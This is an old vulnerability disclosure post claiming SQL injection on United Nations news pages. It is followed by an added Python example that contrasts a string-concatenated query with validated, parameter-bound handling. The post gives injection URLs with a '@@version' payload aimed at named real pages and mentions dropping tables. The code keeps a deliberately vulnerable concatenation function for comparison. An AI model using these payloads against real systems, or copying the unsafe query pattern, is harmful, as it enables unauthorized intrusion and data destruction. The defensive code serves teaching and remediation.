unorg-sql.txt
Posted on 28 February 2007
un.org SQL Injection vulnerabilities
------------------------------------
by s0cratex

I found a small vulnerability in the un.org website...

The bug is of type SQL Injection:

http://www.un.org/spanish/News/fullstorynews.asp?NewsID=7702 AND 1 IN (SELECT @@version)--

or

http://www.un.org/chinese/News/fullstorynews.asp?NewsID=8000 AND 1 IN (SELECT @@version)--

In the example, you can view the version of your Operating System and SQL Server...

Other attacks can be possible, for example a drop table.

Remember that it is the "United Nations" Server...xD

s0cratex@hotmail.com
Nicaragua Exist...
plexinium.com Coming soon
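
Added example (not part of the original post or the site's code): handling a numeric parameter such as NewsID with strict validation, a bound parameter and generic error responses, next to the string-concatenation pattern the URLs above point to. SQLite stands in for SQL Server, and the table, function names and sample rows are constructed assumptions.

```python
import sqlite3

def make_db():
    # Constructed sample data; SQLite stands in for the SQL Server backend (assumption).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO news VALUES (?, ?)",
                   [(7702, "Constructed headline A"), (8000, "Constructed headline B")])
    return db

def fetch_story_concat(db, news_id):
    """Weak pattern: the raw query-string value is pasted into the SQL text."""
    sql = "SELECT title FROM news WHERE id = " + news_id
    return db.execute(sql).fetchall()

def sql_text_reached_parser(db, raw):
    """True when the engine raised an error, i.e. it tried to parse the request value as SQL."""
    try:
        fetch_story_concat(db, raw)
        return False
    except sqlite3.Error:
        return True

def parse_news_id(raw):
    """Accept only a short run of ASCII digits; everything else is rejected."""
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 9):
        raise ValueError("NewsID must be a positive integer")
    return int(raw)

def fetch_story_safe(db, raw_news_id):
    """Validate, bind as a parameter, and keep database error text out of the response."""
    try:
        news_id = parse_news_id(raw_news_id)
    except ValueError:
        return 400, "Bad request"
    try:
        row = db.execute("SELECT title FROM news WHERE id = ?", (news_id,)).fetchone()
    except sqlite3.Error:
        return 500, "Internal error"  # details belong in the server log only
    return (200, row[0]) if row else (404, "Not found")

if __name__ == "__main__":
    db = make_db()
    posted = "7702 AND 1 IN (SELECT @@version)--"  # NewsID value quoted in the post
    print("concatenated query parsed request text as SQL:", sql_text_reached_parser(db, posted))
    print("hardened handler:", fetch_story_safe(db, posted))
    print("normal request:", fetch_story_safe(db, "7702"))
```

With the bound parameter the request value is only ever treated as data, and the generic 500 path means a database error message is never echoed to the client even if one occurs.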